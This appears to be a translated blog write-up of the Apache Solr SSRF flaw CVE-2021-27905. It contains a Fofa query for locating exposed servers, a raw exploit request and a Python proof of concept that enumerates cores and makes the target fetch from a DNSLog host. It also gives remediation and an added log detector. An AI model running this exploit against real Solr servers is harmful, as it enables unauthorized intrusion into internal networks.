(CVE-2021-27905) Apache Solr SSRF Vulnerability

0x01 Vulnerability Description

Apache Solr has an SSRF vulnerability. Exploiting it requires knowing a core name, which is easy to obtain by combining it with the earlier Solr arbitrary file read that affects all versions.

Apache Solr Arbitrary File Read

0x02 Affected Versions

  • Apache Solr < 8.8.2

0x03 Reproduction

Fofa search query (note: unauthorized exploitation against internet-facing systems is illegal):

app='Solr' || app='Apache-Solr'

For installing and configuring Solr, see the earlier article: Apache Solr Arbitrary File Read

Vulnerable location:

/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}

Here {core} is the actual core name on the node and {dnslog} is the DNSLog address.

(The 零组文库 DNSLog is recommended; home-grown tools are just handy. Yes, this is a blatant ad, just having fun~)

Obtaining the core name is not repeated here; see the earlier article: Apache Solr Arbitrary File Read

SSRF request:

GET /solr/{core}/replication?command=fetchindex&masterUrl={dnslog} HTTP/1.1
Host: IP
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Referer: http://IP/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

POC:

# CVE-2021-27905
# Apache solr ssrf
import requests
import urllib3
import json
import sys, getopt

urllib3.disable_warnings()


def title():
    print('[-------------------------------------------------------------]')
    print('[--------------      Apache Solr SSRF漏洞      ---------------]')
    print('[--------               CVE-2021-27905               ----------]')
    print('[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]')
    print('[--------              Author:Henry4E36            ------------]')
    print('[-------------------------------------------------------------]')


def commit():
    # Parse -u/--url and -d/--dnslog from the command line
    url = ''
    dnslog = ''
    try:
        opt, agrs = getopt.getopt(sys.argv[1:], 'hu:d:', ['help', 'url=', 'dnslog='])
        for op, value in opt:
            if op == '-h' or op == '--help':
                print('''
            [-]   Apache Solr SSRF漏洞 (CVE-2021-27905)
            [-]   Options:
                     -h or --help      :   方法说明
                     -u or --url       :   站点URL地址
                     -d or --dnslog    :   DnsLog
                ''')
                sys.exit(0)
            elif op == '-u' or op == '--url':
                url = value
            elif op == '-d' or op == '--dnslog':
                dnslog = value
            else:
                print('[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog')
                sys.exit()
        if not url or not dnslog:
            print('[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog')
            sys.exit(0)
        return url, dnslog
    except Exception as e:
        print('[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog')
        sys.exit(0)


def target_core(url):
    # List the cores through the admin API and take the first one
    target_url = url + '/solr/admin/cores?indexInfo=false&wt=json'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'
    }
    try:
        res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
        core = list(json.loads(res.text)['status'])[0]
        return core
    except Exception as e:
        print(f'[!]  目标系统: {url} 出现意外!\n ', e)


def ssrf(url, core, dnslog):
    # Ask the replication handler to fetch an index from the DNSLog host
    target_url = url + f'/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'
    }
    try:
        res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
        status = json.loads(res.text)['status']
        if res.status_code == 200 and status == 'OK':
            print(f'[!]  \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m')
        else:
            print(f'[0]  目标系统: {url} 不存在SSRF漏洞')
    except Exception as e:
        print(f'[!]  目标系统: {url} 出现意外!\n ', e)


if __name__ == '__main__':
    title()
    url, dnslog = commit()
    core = target_core(url)
    if core:
        ssrf(url, core, dnslog)

Run result:

0x04 Remediation

Upgrade to the latest version (the affected range is Apache Solr < 8.8.2).
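Alongside upgrading, the request shape shown above is easy to spot in Solr's request log: a call to the replication handler with command=fetchindex whose masterUrl points at a host that is not one of the cluster's own replication masters. The detector below is an added example, not part of the original post or of the Solr project; the Jetty-style log format, the allow-list of master hosts and the sample log lines are all constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hypothetical allow-list: hosts that legitimately serve as replication masters.
ALLOWED_MASTER_HOSTS = {"solr-master.internal", "10.0.0.5"}

# Jetty-style request-log line: client ip, '-', user, [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log: one fetchindex from a known master, two pointing at an outside host
# (one percent-encoded with a scheme, one bare host as in the request packet above).
SAMPLE_LOG = """\
10.0.0.7 - - [01/May/2021:10:00:00 +0000] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 512
203.0.113.9 - - [01/May/2021:10:00:01 +0000] "GET /solr/collection1/replication/?command=fetchindex&masterUrl=http%3A%2F%2Fabc.dnslog.example HTTP/1.1" 200 78
10.0.0.5 - - [01/May/2021:10:00:02 +0000] "GET /solr/collection1/replication?command=fetchindex&masterUrl=http://solr-master.internal:8983/solr/collection1 HTTP/1.1" 200 78
203.0.113.9 - - [01/May/2021:10:00:03 +0000] "GET /solr/collection1/replication?command=fetchindex&masterUrl=abc.dnslog.example HTTP/1.1" 200 78
10.0.0.7 - - [01/May/2021:10:00:04 +0000] "GET /solr/collection1/select?q=*:* HTTP/1.1" 200 2048
"""


def master_host(master_url):
    """Host part of a masterUrl value; a bare host with no scheme is treated as http."""
    if "://" not in master_url:
        master_url = "http://" + master_url
    return urlparse(master_url).hostname


def find_suspicious_fetchindex(log_text, allowed_hosts=ALLOWED_MASTER_HOSTS):
    """Return (client_ip, core, master_host) for fetchindex calls whose masterUrl is not allow-listed."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        parsed = urlparse(target)
        path_m = re.match(r"^/solr/([^/]+)/replication/?$", parsed.path)
        if not path_m:
            continue
        qs = parse_qs(parsed.query)  # percent-decodes parameter values
        if "fetchindex" not in qs.get("command", []):
            continue
        for master in qs.get("masterUrl", []):
            host = master_host(master)
            if host not in allowed_hosts:
                hits.append((client, path_m.group(1), host))
    return hits


if __name__ == "__main__":
    for client, core, host in find_suspicious_fetchindex(SAMPLE_LOG):
        print(f"suspicious fetchindex from {client}: core={core} masterUrl host={host}")
```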

Closing Remarks

This article is for learning and exchange only; do not use this vulnerability for illegal activities.

https://github.com/Henry4E36/Solr-SSRF

